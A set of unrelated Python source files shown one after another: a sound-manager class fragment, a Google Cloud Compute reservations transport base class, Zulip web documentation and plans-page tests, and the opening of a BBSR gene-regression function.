spi.setBalance(self.balance)
spi.play()
self.sounds.append(spi)
return spi
def stopAll(self):
"""
Stops all currently playing or paused sounds.
"""
for spi in self.sounds:
spi.stop()
def pauseAll(self):
"""
Pauses all currently playing sounds.
"""
for spi in self.sounds:
spi.pause()
def resumeAll(self):
"""
Resumes all currently paused sounds.
"""
for spi in self.sounds:
spi.play()
def isSoundPlaying(self, sndName):
"""
Returns True if the sound described the specified sound resource
is being played.
"""
pass
def setVolume(self, volume):
"""
Sets the global volume level.
Individual sounds can playback at a different volume level.
"""
if volume < 0.0:
volume = 0.0
elif volume > 1.0:
volume = 1.0
self.volume = volume
def getVolume(self):
"""
Returns the global volume level.
"""
return self.volume
def getPlayRate(self):
'''
Returns the currently default rate of playback.
'''
return self.rate
def setPlayRate(self, value):
'''
Sets the currently default rate of playback.
'''
self.rate = value
def getBalance(self):
'''
Returns the currently default sound balance.
'''
return self.balance
def setBalance(self, value):
'''
Changes the balance of a sound. The range is between -1.0 to 1.0. Hard left is -1.0 and hard right is 1.0.
'''
if value < -1.0:
value = -1.0
elif value > 1.0:
value = 1.0
self.balance = value
def enableSounds(self):
'''
Enables playback of sounds. Sounds are enabled by default.
'''
self.enabled = True
base.enableSoundEffects(True)
def disableSounds(self):
'''
Disables sounds playback.
'''
self.enabled = False
base.enableSoundEffects(False)
def isEnabled(self):
'''
@return: True if sounds are enabled and False if otherwise.
'''
return self.enabled
|
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import pkg_resources
import google.auth # type: ignore
import google.api_core
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.compute_v1.types import compute
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-compute",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class ReservationsTransport(abc.ABC):
"""Abstract transport class for Reservations."""
AUTH_SCOPES = (
"https://www.googleapis.com/auth/compute",
"https://www.googleapis.com/auth/cloud-platform",
)
DEFAULT_HOST: str = "compute.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = {"scopes": scopes, "default_scopes": self.AUTH_SCOPES}
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
# If the credentials are service account credentials, then always try to use self signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.aggregated_list: gapic_v1.method.wrap_method(
self.aggregated_list, default_timeout=None, client_info=client_info,
),
self.delete: gapic_v1.method.wrap_method(
self.delete, default_timeout=None, client_info=client_info,
),
self.get: gapic_v1.method.wrap_method(
self.get, default_timeout=None, client_info=client_info,
),
self.get_iam_policy: gapic_v1.method.wrap_method(
self.get_iam_policy, default_timeout=None, client_info=client_info,
),
self.insert: gapic_v1.method.wrap_method(
self.insert, default_timeout=None, client_info=client_info,
),
self.list: gapic_v1.method.wrap_method(
self.list, default_timeout=None, client_info=client_info,
),
self.resize: gapic_v1.method.wrap_method(
self.resize, default_timeout=None, client_info=client_info,
),
self.set_iam_policy: gapic_v1.method.wrap_method(
self.set_iam_policy, default_timeout=None, client_info=client_info,
),
self.test_iam_permissions: gapic_v1.method.wrap_method(
self.test_iam_permissions,
default_timeout=None,
client_info=client_info,
),
self.update: gapic_v1.method.wrap_method(
self.update, default_timeout=None, client_info=client_info,
),
}
def close(self):
"""Closes resources associated with the transport.
.. warning::
Only call this method if the transport is NOT shared
with other clients - this may cause errors in other clients!
"""
raise NotImplementedError()
@property
def aggregated_list(
self,
) -> Callable[
[compute.AggregatedListReservationsRequest],
Union[
compute.ReservationAggregatedList,
Awaitable[compute.ReservationAggregatedList],
],
]:
raise NotImplementedError()
@property
def delete(
self,
) -> Callable[
[compute.DeleteReservationRequest],
Union[compute.Operation, Awaitable[compute.Operation]],
]:
raise NotImplementedError()
@property
def get(
self,
) -> Callable[
[compute.GetReservationRequest],
Union[compute.Reservation, Awaitable[compute.Reservation]],
]:
raise NotImplementedError()
@property
def get_iam_policy(
self,
) -> Callable[
[compute.GetIamPolicyReservationRequest],
Union[compute.Policy, Awaitable[compute.Policy]],
]:
raise NotImplementedError()
@property
def insert(
self,
) -> Callable[
[compute.InsertReservationRequest],
Union[compute.Operation, Awaitable[compute.Operation]],
]:
raise NotImplementedError()
@property
def list(
self,
) -> Callable[
[compute.ListReservationsRequest],
Union[compute.ReservationList, Awaitable[compute.ReservationList]],
]:
raise NotImplementedError()
@property
def resize(
self,
) -> Callable[
[compute.ResizeReservationRequest],
Union[compute.Operation, Awaitable[compute.Operation]],
]:
raise NotImplementedError()
@property
def set_iam_policy(
self,
) -> Callable[
[compute.SetIamPolicyReservationRequest],
Union[compute.Policy, Awaitable[compute.Policy]],
]:
raise NotImplementedError()
@property
def test_iam_permissions(
self,
) -> Callable[
[compute.TestIamPermissionsReservationRequest],
Union[
compute.TestPermissionsResponse, Awaitable[compute.TestPermissionsResponse]
],
]:
raise NotImplementedError()
@property
def update(
self,
) -> Callable[
[compute.UpdateReservationRequest],
Union[compute.Operation, Awaitable[compute.Operation]],
]:
raise NotImplementedError()
__all__ = ("ReservationsTransport",)
|
|
import os
import re
from typing import Any, Dict, Sequence
from unittest import mock, skipUnless
from urllib.parse import urlsplit
import orjson
from django.conf import settings
from django.http import HttpResponse
from django.test import override_settings
from django.utils.timezone import now as timezone_now
from corporate.models import Customer, CustomerPlan
from zerver.context_processors import get_apps_page_url
from zerver.lib.integrations import INTEGRATIONS
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import HostRequestMock
from zerver.models import Realm, get_realm
from zerver.views.documentation import add_api_uri_context
class DocPageTest(ZulipTestCase):
def get_doc(self, url: str, subdomain: str) -> HttpResponse:
if url[0:23] == "/integrations/doc-html/":
return self.client_get(url, subdomain=subdomain, HTTP_X_REQUESTED_WITH="XMLHttpRequest")
return self.client_get(url, subdomain=subdomain)
def print_msg_if_error(self, url: str, response: HttpResponse) -> None: # nocoverage
if response.status_code == 200:
return
print("Error processing URL:", url)
if response.get("Content-Type") == "application/json":
content = orjson.loads(response.content)
print()
print("======================================================================")
print("ERROR: {}".format(content.get("msg")))
print()
def _test(
self,
url: str,
expected_content: str,
extra_strings: Sequence[str] = [],
landing_missing_strings: Sequence[str] = [],
landing_page: bool = True,
doc_html_str: bool = False,
) -> None:
# Test the URL on the "zephyr" subdomain
result = self.get_doc(url, subdomain="zephyr")
self.print_msg_if_error(url, result)
self.assertEqual(result.status_code, 200)
self.assertIn(expected_content, str(result.content))
for s in extra_strings:
self.assertIn(s, str(result.content))
if not doc_html_str:
self.assert_in_success_response(
['<meta name="robots" content="noindex,nofollow" />'], result
)
# Test the URL on the root subdomain
result = self.get_doc(url, subdomain="")
self.print_msg_if_error(url, result)
self.assertEqual(result.status_code, 200)
self.assertIn(expected_content, str(result.content))
if not doc_html_str:
self.assert_in_success_response(
['<meta name="robots" content="noindex,nofollow" />'], result
)
for s in extra_strings:
self.assertIn(s, str(result.content))
if not landing_page:
return
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
# Test the URL on the root subdomain with the landing page setting
result = self.get_doc(url, subdomain="")
self.print_msg_if_error(url, result)
self.assertEqual(result.status_code, 200)
self.assertIn(expected_content, str(result.content))
for s in extra_strings:
self.assertIn(s, str(result.content))
for s in landing_missing_strings:
self.assertNotIn(s, str(result.content))
if not doc_html_str:
# Every page has a meta-description
self.assert_in_success_response(['<meta name="description" content="'], result)
self.assert_not_in_success_response(
['<meta name="robots" content="noindex,nofollow" />'], result
)
# Test the URL on the "zephyr" subdomain with the landing page setting
result = self.get_doc(url, subdomain="zephyr")
self.print_msg_if_error(url, result)
self.assertEqual(result.status_code, 200)
self.assertIn(expected_content, str(result.content))
for s in extra_strings:
self.assertIn(s, str(result.content))
if not doc_html_str:
self.assert_in_success_response(
['<meta name="robots" content="noindex,nofollow" />'], result
)
def test_api_doc_endpoints(self) -> None:
# We extract the set of /api/ endpoints to check by parsing
# the /api/ page sidebar for links starting with /api/.
api_page_raw = str(self.client_get("/api/").content)
ENDPOINT_REGEXP = re.compile(r"href=\"/api/\s*(.*?)\"")
endpoint_list_set = set(re.findall(ENDPOINT_REGEXP, api_page_raw))
endpoint_list = [f"/api/{endpoint}" for endpoint in endpoint_list_set]
# Validate that the parsing logic isn't broken, since if it
# broke, the below would become a noop.
self.assertGreater(len(endpoint_list), 70)
for endpoint in endpoint_list:
self._test(endpoint, "", doc_html_str=True)
result = self.client_get(
"/api/nonexistent-page",
follow=True,
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
self.assertEqual(result.status_code, 404)
def test_doc_endpoints(self) -> None:
self._test("/api/", "The Zulip API")
self._test("/api/api-keys", "be careful with it")
self._test("/api/installation-instructions", "No download required!")
self._test("/api/send-message", "steal away your hearts")
self._test("/api/render-message", "**foo**")
self._test("/api/get-streams", "include_public")
self._test("/api/get-stream-id", "The name of the stream to access.")
self._test("/api/get-subscriptions", "Get all streams that the user is subscribed to.")
self._test("/api/get-users", "client_gravatar")
self._test("/api/register-queue", "apply_markdown")
self._test("/api/get-events", "dont_block")
self._test("/api/delete-queue", "Delete a previously registered queue")
self._test("/api/update-message", "propagate_mode")
self._test("/api/get-own-user", "does not accept any parameters.")
self._test("/api/subscribe", "authorization_errors_fatal")
self._test("/api/create-user", "zuliprc-admin")
self._test("/api/unsubscribe", "not_removed")
if settings.ZILENCER_ENABLED:
self._test("/team/", "industry veterans")
self._test("/history/", "Cambridge, Massachusetts")
# Test the i18n version of one of these pages.
self._test("/en/history/", "Cambridge, Massachusetts")
if settings.ZILENCER_ENABLED:
self._test("/apps/", "Apps for every platform.")
self._test("/features/", "Beautiful messaging")
self._test("/hello/", "Chat for distributed teams", landing_missing_strings=["Log in"])
self._test("/development-community/", "Zulip development community")
self._test("/why-zulip/", "Why Zulip?")
self._test("/for/open-source/", "for open source projects")
self._test("/for/events/", "for conferences and events")
self._test("/for/education/", "education pricing")
self._test("/case-studies/tum/", "Technical University of Munich")
self._test("/case-studies/ucsd/", "UCSD")
self._test("/case-studies/rust/", "Rust programming language")
self._test("/case-studies/lean/", "Lean theorem prover")
self._test("/for/research/", "for research")
self._test("/for/business/", "Communication efficiency represents")
self._test("/for/communities/", "Zulip for communities")
self._test("/security/", "TLS encryption")
self._test("/attribution/", "Attributions")
self._test("/devlogin/", "Normal users", landing_page=False)
self._test("/devtools/", "Useful development URLs")
self._test("/errors/404/", "Page not found")
self._test("/errors/5xx/", "Internal server error")
self._test("/emails/", "manually generate most of the emails by clicking")
result = self.client_get(
"/integrations/doc-html/nonexistent_integration",
follow=True,
HTTP_X_REQUESTED_WITH="XMLHttpRequest",
)
self.assertEqual(result.status_code, 404)
result = self.client_get("/new-user/")
self.assertEqual(result.status_code, 301)
self.assertIn("hello", result["Location"])
result = self.client_get("/developer-community/")
self.assertEqual(result.status_code, 301)
self.assertIn("development-community", result["Location"])
result = self.client_get("/for/companies/", follow=True)
self.assert_in_success_response(["Communication efficiency represents"], result)
def test_portico_pages_open_graph_metadata(self) -> None:
# Why Zulip
url = "/why-zulip/"
title = '<meta property="og:title" content="Team chat with first-class threading" />'
description = '<meta property="og:description" content="Most team chats are overwhelming'
self._test(url, title, doc_html_str=True)
self._test(url, description, doc_html_str=True)
# Features
url = "/features/"
title = '<meta property="og:title" content="Zulip features" />'
description = '<meta property="og:description" content="First class threading'
self._test(url, title, doc_html_str=True)
self._test(url, description, doc_html_str=True)
def test_integration_doc_endpoints(self) -> None:
self._test(
"/integrations/",
"native integrations.",
extra_strings=[
"And hundreds more through",
"Zapier",
"IFTTT",
],
)
for integration in INTEGRATIONS.keys():
url = f"/integrations/doc-html/{integration}"
self._test(url, "", doc_html_str=True)
def test_integration_pages_open_graph_metadata(self) -> None:
url = "/integrations/doc/github"
title = '<meta property="og:title" content="Connect GitHub to Zulip" />'
description = '<meta property="og:description" content="Zulip comes with over'
self._test(url, title, doc_html_str=True)
self._test(url, description, doc_html_str=True)
# Test category pages
url = "/integrations/communication"
title = '<meta property="og:title" content="Connect your Communication tools to Zulip" />'
description = '<meta property="og:description" content="Zulip comes with over'
self._test(url, title, doc_html_str=True)
self._test(url, description, doc_html_str=True)
# Test integrations page
url = "/integrations/"
title = '<meta property="og:title" content="Connect the tools you use to Zulip" />'
description = '<meta property="og:description" content="Zulip comes with over'
self._test(url, title, doc_html_str=True)
self._test(url, description, doc_html_str=True)
def test_doc_html_str_non_ajax_call(self) -> None:
# We don't need to test all the pages for 404
for integration in list(INTEGRATIONS.keys())[5]:
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
url = f"/en/integrations/doc-html/{integration}"
result = self.client_get(url, subdomain="", follow=True)
self.assertEqual(result.status_code, 404)
result = self.client_get(url, subdomain="zephyr", follow=True)
self.assertEqual(result.status_code, 404)
url = f"/en/integrations/doc-html/{integration}"
result = self.client_get(url, subdomain="", follow=True)
self.assertEqual(result.status_code, 404)
result = self.client_get(url, subdomain="zephyr", follow=True)
self.assertEqual(result.status_code, 404)
result = self.client_get("/integrations/doc-html/nonexistent_integration", follow=True)
self.assertEqual(result.status_code, 404)
def test_electron_detection(self) -> None:
result = self.client_get("/accounts/password/reset/")
# TODO: Ideally, this Mozilla would be the specific browser.
self.assertTrue('data-platform="Mozilla"' in result.content.decode())
result = self.client_get("/accounts/password/reset/", HTTP_USER_AGENT="ZulipElectron/1.0.0")
self.assertTrue('data-platform="ZulipElectron"' in result.content.decode())
class HelpTest(ZulipTestCase):
def test_help_settings_links(self) -> None:
result = self.client_get("/help/change-the-time-format")
self.assertEqual(result.status_code, 200)
self.assertIn(
'Go to <a href="/#settings/display-settings">Display settings</a>', str(result.content)
)
# Check that the sidebar was rendered properly.
self.assertIn("Getting started with Zulip", str(result.content))
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/help/change-the-time-format", subdomain="")
self.assertEqual(result.status_code, 200)
self.assertIn("<strong>Display settings</strong>", str(result.content))
self.assertNotIn("/#settings", str(result.content))
def test_help_relative_links_for_gear(self) -> None:
result = self.client_get("/help/analytics")
self.assertIn('<a href="/stats">Usage statistics</a>', str(result.content))
self.assertEqual(result.status_code, 200)
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/help/analytics", subdomain="")
self.assertEqual(result.status_code, 200)
self.assertIn("<strong>Usage statistics</strong>", str(result.content))
self.assertNotIn("/stats", str(result.content))
def test_help_relative_links_for_stream(self) -> None:
result = self.client_get("/help/message-a-stream-by-email")
self.assertIn('<a href="/#streams/subscribed">Your streams</a>', str(result.content))
self.assertEqual(result.status_code, 200)
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/help/message-a-stream-by-email", subdomain="")
self.assertEqual(result.status_code, 200)
self.assertIn("<strong>Manage streams</strong>", str(result.content))
self.assertNotIn("/#streams", str(result.content))
class IntegrationTest(ZulipTestCase):
def test_check_if_every_integration_has_logo_that_exists(self) -> None:
for integration in INTEGRATIONS.values():
path = urlsplit(integration.logo_url).path
self.assertTrue(os.path.isfile(settings.DEPLOY_ROOT + path), integration.name)
def test_api_url_view_subdomains_base(self) -> None:
context: Dict[str, Any] = {}
add_api_uri_context(context, HostRequestMock())
self.assertEqual(context["api_url_scheme_relative"], "testserver/api")
self.assertEqual(context["api_url"], "http://testserver/api")
self.assertTrue(context["html_settings_links"])
@override_settings(ROOT_DOMAIN_LANDING_PAGE=True)
def test_api_url_view_subdomains_homepage_base(self) -> None:
context: Dict[str, Any] = {}
add_api_uri_context(context, HostRequestMock())
self.assertEqual(context["api_url_scheme_relative"], "yourZulipDomain.testserver/api")
self.assertEqual(context["api_url"], "http://yourZulipDomain.testserver/api")
self.assertFalse(context["html_settings_links"])
def test_api_url_view_subdomains_full(self) -> None:
context: Dict[str, Any] = {}
request = HostRequestMock(host="mysubdomain.testserver")
add_api_uri_context(context, request)
self.assertEqual(context["api_url_scheme_relative"], "mysubdomain.testserver/api")
self.assertEqual(context["api_url"], "http://mysubdomain.testserver/api")
self.assertTrue(context["html_settings_links"])
def test_html_settings_links(self) -> None:
context: Dict[str, Any] = {}
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
add_api_uri_context(context, HostRequestMock())
self.assertEqual(context["settings_html"], "Zulip settings page")
self.assertEqual(context["subscriptions_html"], "streams page")
context = {}
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
add_api_uri_context(context, HostRequestMock(host="mysubdomain.testserver"))
self.assertEqual(context["settings_html"], '<a href="/#settings">Zulip settings page</a>')
self.assertEqual(
context["subscriptions_html"], '<a target="_blank" href="/#streams">streams page</a>'
)
context = {}
add_api_uri_context(context, HostRequestMock())
self.assertEqual(context["settings_html"], '<a href="/#settings">Zulip settings page</a>')
self.assertEqual(
context["subscriptions_html"], '<a target="_blank" href="/#streams">streams page</a>'
)
class AboutPageTest(ZulipTestCase):
@skipUnless(settings.ZILENCER_ENABLED, "requires zilencer")
def test_endpoint(self) -> None:
with self.settings(CONTRIBUTOR_DATA_FILE_PATH="zerver/tests/fixtures/authors.json"):
result = self.client_get("/team/")
self.assert_in_success_response(["Our amazing community"], result)
self.assert_in_success_response(["2017-11-20"], result)
self.assert_in_success_response(["timabbott", "showell", "gnprice", "rishig"], result)
with mock.patch("zerver.views.portico.open", side_effect=FileNotFoundError) as m:
result = self.client_get("/team/")
self.assertEqual(result.status_code, 200)
self.assert_in_success_response(["Never ran"], result)
m.assert_called_once()
with self.settings(ZILENCER_ENABLED=False):
result = self.client_get("/team/")
self.assertEqual(result.status_code, 301)
self.assertEqual(result["Location"], "https://zulip.com/team/")
class SmtpConfigErrorTest(ZulipTestCase):
def test_smtp_error(self) -> None:
result = self.client_get("/config-error/smtp")
self.assertEqual(result.status_code, 200)
self.assert_in_success_response(["email configuration"], result)
class PlansPageTest(ZulipTestCase):
def test_plans_auth(self) -> None:
root_domain = ""
result = self.client_get("/plans/", subdomain=root_domain)
self.assert_in_success_response(["Self-host Zulip"], result)
self.assert_not_in_success_response(["/upgrade#sponsorship"], result)
self.assert_in_success_response(["/accounts/go/?next=/upgrade%23sponsorship"], result)
non_existent_domain = "moo"
result = self.client_get("/plans/", subdomain=non_existent_domain)
self.assertEqual(result.status_code, 404)
self.assert_in_response("does not exist", result)
realm = get_realm("zulip")
realm.plan_type = Realm.PLAN_TYPE_STANDARD_FREE
realm.save(update_fields=["plan_type"])
result = self.client_get("/plans/", subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "/accounts/login/?next=/plans")
guest_user = "polonius"
self.login(guest_user)
result = self.client_get("/plans/", subdomain="zulip", follow=True)
self.assertEqual(result.status_code, 404)
organization_member = "hamlet"
self.login(organization_member)
result = self.client_get("/plans/", subdomain="zulip")
self.assert_in_success_response(["Current plan"], result)
self.assert_in_success_response(["/upgrade#sponsorship"], result)
self.assert_not_in_success_response(["/accounts/go/?next=/upgrade%23sponsorship"], result)
# Test root domain, with login on different domain
result = self.client_get("/plans/", subdomain="")
# TODO: works in manual testing, but I suspect something is funny in
# the test environment
# self.assert_in_success_response(["Sign up now"], result)
def test_CTA_text_by_plan_type(self) -> None:
sign_up_now = "Create organization"
upgrade_to_standard = "Upgrade to Standard"
current_plan = "Current plan"
sponsorship_pending = "Sponsorship pending"
# Root domain
result = self.client_get("/plans/", subdomain="")
self.assert_in_success_response([sign_up_now, upgrade_to_standard], result)
self.assert_not_in_success_response([current_plan, sponsorship_pending], result)
realm = get_realm("zulip")
realm.plan_type = Realm.PLAN_TYPE_SELF_HOSTED
realm.save(update_fields=["plan_type"])
with self.settings(PRODUCTION=True):
result = self.client_get("/plans/", subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "https://zulip.com/plans")
self.login("iago")
# SELF_HOSTED should hide the local plans page, even if logged in
result = self.client_get("/plans/", subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "https://zulip.com/plans")
# But in the development environment, it renders a page
result = self.client_get("/plans/", subdomain="zulip")
self.assert_in_success_response([sign_up_now, upgrade_to_standard], result)
self.assert_not_in_success_response([current_plan, sponsorship_pending], result)
realm.plan_type = Realm.PLAN_TYPE_LIMITED
realm.save(update_fields=["plan_type"])
result = self.client_get("/plans/", subdomain="zulip")
self.assert_in_success_response([current_plan, upgrade_to_standard], result)
self.assert_not_in_success_response([sign_up_now, sponsorship_pending], result)
with self.settings(FREE_TRIAL_DAYS=60):
result = self.client_get("/plans/", subdomain="zulip")
self.assert_in_success_response([current_plan, "Start 60 day free trial"], result)
self.assert_not_in_success_response(
[sign_up_now, sponsorship_pending, upgrade_to_standard], result
)
realm.plan_type = Realm.PLAN_TYPE_STANDARD_FREE
realm.save(update_fields=["plan_type"])
result = self.client_get("/plans/", subdomain="zulip")
self.assert_in_success_response([current_plan], result)
self.assert_not_in_success_response(
[sign_up_now, upgrade_to_standard, sponsorship_pending], result
)
realm.plan_type = Realm.PLAN_TYPE_STANDARD
realm.save(update_fields=["plan_type"])
result = self.client_get("/plans/", subdomain="zulip")
self.assert_in_success_response([current_plan], result)
self.assert_not_in_success_response(
[sign_up_now, upgrade_to_standard, sponsorship_pending], result
)
customer = Customer.objects.create(realm=get_realm("zulip"), stripe_customer_id="cus_id")
plan = CustomerPlan.objects.create(
customer=customer,
tier=CustomerPlan.STANDARD,
status=CustomerPlan.FREE_TRIAL,
billing_cycle_anchor=timezone_now(),
billing_schedule=CustomerPlan.MONTHLY,
)
result = self.client_get("/plans/", subdomain="zulip")
self.assert_in_success_response(["Current plan (free trial)"], result)
self.assert_not_in_success_response(
[sign_up_now, upgrade_to_standard, sponsorship_pending], result
)
realm.plan_type = Realm.PLAN_TYPE_LIMITED
realm.save()
customer.sponsorship_pending = True
customer.save()
plan.delete()
result = self.client_get("/plans/", subdomain="zulip")
self.assert_in_success_response([current_plan], result)
self.assert_in_success_response([current_plan, sponsorship_pending], result)
self.assert_not_in_success_response([sign_up_now, upgrade_to_standard], result)
class AppsPageTest(ZulipTestCase):
def test_get_apps_page_url(self) -> None:
with self.settings(ZILENCER_ENABLED=False):
apps_page_url = get_apps_page_url()
self.assertEqual(apps_page_url, "https://zulip.com/apps/")
with self.settings(ZILENCER_ENABLED=True):
apps_page_url = get_apps_page_url()
self.assertEqual(apps_page_url, "/apps/")
def test_apps_view(self) -> None:
result = self.client_get("/apps")
self.assertEqual(result.status_code, 301)
self.assertTrue(result["Location"].endswith("/apps/"))
with self.settings(ZILENCER_ENABLED=False):
result = self.client_get("/apps/")
self.assertEqual(result.status_code, 301)
self.assertTrue(result["Location"] == "https://zulip.com/apps/")
with self.settings(ZILENCER_ENABLED=False):
result = self.client_get("/apps/linux")
self.assertEqual(result.status_code, 301)
self.assertTrue(result["Location"] == "https://zulip.com/apps/")
with self.settings(ZILENCER_ENABLED=True):
result = self.client_get("/apps/")
self.assertEqual(result.status_code, 200)
html = result.content.decode()
self.assertIn("Apps for every platform.", html)
def test_app_download_link_view(self) -> None:
return_value = "https://desktop-download.zulip.com/v5.4.3/Zulip-Web-Setup-5.4.3.exe"
with mock.patch(
"zerver.views.portico.get_latest_github_release_download_link_for_platform",
return_value=return_value,
) as m:
result = self.client_get("/apps/download/windows")
m.assert_called_once_with("windows")
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"] == return_value)
result = self.client_get("/apps/download/plan9")
self.assertEqual(result.status_code, 404)
class PrivacyTermsTest(ZulipTestCase):
def test_terms_and_policies_index(self) -> None:
with self.settings(POLICIES_DIRECTORY="corporate/policies"):
response = self.client_get("/policies/")
self.assert_in_success_response(["Terms and policies"], response)
def test_custom_terms_of_service_template(self) -> None:
not_configured_message = "This server is an installation"
with self.settings(POLICIES_DIRECTORY="zerver/policies_absent"):
response = self.client_get("/policies/terms")
self.assert_in_response(not_configured_message, response)
with self.settings(POLICIES_DIRECTORY="corporate/policies"):
response = self.client_get("/policies/terms")
self.assert_in_success_response(["Kandra Labs"], response)
def test_custom_privacy_policy_template(self) -> None:
not_configured_message = "This server is an installation"
with self.settings(POLICIES_DIRECTORY="zerver/policies_absent"):
response = self.client_get("/policies/privacy")
self.assert_in_response(not_configured_message, response)
with self.settings(POLICIES_DIRECTORY="corporate/policies"):
response = self.client_get("/policies/privacy")
self.assert_in_success_response(["Kandra Labs"], response)
def test_custom_privacy_policy_template_with_absolute_url(self) -> None:
"""Verify that using our recommended production default of an absolute path
like /etc/zulip/policies/ works."""
current_dir = os.path.dirname(os.path.abspath(__file__))
abs_path = os.path.abspath(
os.path.join(current_dir, "..", "..", "templates/corporate/policies")
)
with self.settings(POLICIES_DIRECTORY=abs_path):
response = self.client_get("/policies/privacy")
self.assert_in_success_response(["Kandra Labs"], response)
with self.settings(POLICIES_DIRECTORY=abs_path):
response = self.client_get("/policies/nonexistent")
self.assert_in_response("No such page", response)
def test_redirects_from_older_urls(self) -> None:
with self.settings(POLICIES_DIRECTORY="corporate/policies"):
result = self.client_get("/privacy/", follow=True)
self.assert_in_success_response(["Kandra Labs"], result)
with self.settings(POLICIES_DIRECTORY="corporate/policies"):
result = self.client_get("/terms/", follow=True)
self.assert_in_success_response(["Kandra Labs"], result)
def test_no_nav(self) -> None:
# Test that our ?nav=0 feature of /privacy and /terms,
# designed to comply with the Apple App Store draconian
# policies that ToS/Privacy pages linked from an iOS app have
# no links to the rest of the site if there's pricing
# information for anything elsewhere on the site.
# We don't have this link at all on these pages; this first
# line of the test would change if we were to adjust the
# design.
response = self.client_get("/policies/terms")
self.assert_not_in_success_response(["Back to Zulip"], response)
response = self.client_get("/policies/terms", {"nav": "no"})
self.assert_not_in_success_response(["Back to Zulip"], response)
response = self.client_get("/policies/privacy", {"nav": "no"})
self.assert_not_in_success_response(["Back to Zulip"], response)
|
|
import pandas as pd
import numpy as np
import itertools
from itertools import compress
import math
from scipy import special
import multiprocessing
from functools import partial
import os, sys
from . import utils
# Wrapper function for BBSRforOneGene that's called in BBSR
gx, gy, gpp, gwm, gns = None, None, None, None, None
def BBSRforOneGeneWrapper(ind): return BBSRforOneGene(ind, gx, gy, gpp, gwm, gns)
def BBSR(X, Y, clr_mat, nS, no_pr_val, weights_mat, prior_mat, kvs, rank, ownCheck):
G = Y.shape[0] # number of genes
genes = Y.index.values.tolist()
K = X.shape[0] # max number of possible predictors (number of TFs)
tfs = X.index.values.tolist()
# Scale and permute design and response matrix
X = ((X.transpose() - X.transpose().mean()) / X.transpose().std(ddof=1)).transpose()
Y = ((Y.transpose() - Y.transpose().mean()) / Y.transpose().std(ddof=1)).transpose()
weights_mat = weights_mat.loc[genes,tfs]
clr_mat = clr_mat.loc[genes, tfs]
prior_mat = prior_mat.loc[genes, tfs]
# keep all predictors that we have priors for
pp = pd.DataFrame(((prior_mat.ix[:,:] != 0)|(weights_mat.ix[:,:]!=no_pr_val)) & ~pd.isnull(clr_mat))
mask = clr_mat == 0
# for each gene, add the top nS predictors of the list to possible predictors
clr_mat[mask] = np.nan
for ind in range(0,G):
clr_na = len(np.argwhere(np.isnan(clr_mat.ix[ind,])).flatten().tolist())
clr_w_na = np.argsort(clr_mat.ix[ind,].tolist())
if clr_na>0:
clr_order = clr_w_na[:-clr_na][::-1]
else:
clr_order = clr_w_na[:][::-1]
pp.ix[ind, clr_order[0:min(K, nS, len(clr_order))]] = True
preds = np.intersect1d(genes, tfs)
subset = pp.ix[preds,preds].values
